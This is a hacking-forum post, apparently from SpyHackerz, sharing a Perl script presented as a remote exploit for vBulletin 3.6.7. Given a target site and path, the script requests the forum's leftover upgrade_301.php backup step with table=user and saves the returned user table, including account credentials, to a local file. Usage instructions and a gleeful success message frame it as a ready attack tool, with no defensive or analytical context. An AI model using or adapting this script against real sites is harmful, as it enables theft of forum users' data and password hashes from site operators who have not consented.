vBulletin 3.6.7 Remote SQL Exploit (1 Viewer)

*** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***

View hidden content is available for registered users!

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
system("clear");
print "------------------------------------------------\n";
print " vBulletin 3.6.7 Exploit \n";
print " Coded by Hani Xavi \n";
print "------------------------------------------------\n";
$target = $ARGV[0];
$path = $ARGV[1];
if($target eq '')
{
print "[*] Usage: perl vb.pl <target> <path> \n";
exit(1);
}

if($target !~ /http:\/\//)
{
$target = "http://$target";
}
sleep 1;
print "[*] Exploiting . . \n";
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0(X11; Linux x86_64) AppleWebKit/5320 (KHTML, like Gecko) Chrome/13.0.819.0 Safari/5320');
$website = "$target/$path/install/upgrade_301.php?step=backup&do=sqltable&table=user";
$req = $agent->request(HTTP::Request->new(GET=>$website));
if($req->is_success)
{
open(FILE, "> vBulletin_content.txt");
print FILE $req->content;
close(FILE);
print "[*] Exploit sent ! Look in the file 'vBulletin_content.txt' :) \n";
}
else
{
print "[-] Exploit not sent . \n";
}
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Yanıt yazmak için giriş yapmalısınız
Forum özelliklerini kullanmak ve Level 2 üyelik satın almak için hesabınıza giriş yapın.

Users who are viewing this thread

133,264Konular
3,283,543Mesajlar
319,753Kullanıcılar
UterusSon Üye
Üst Alt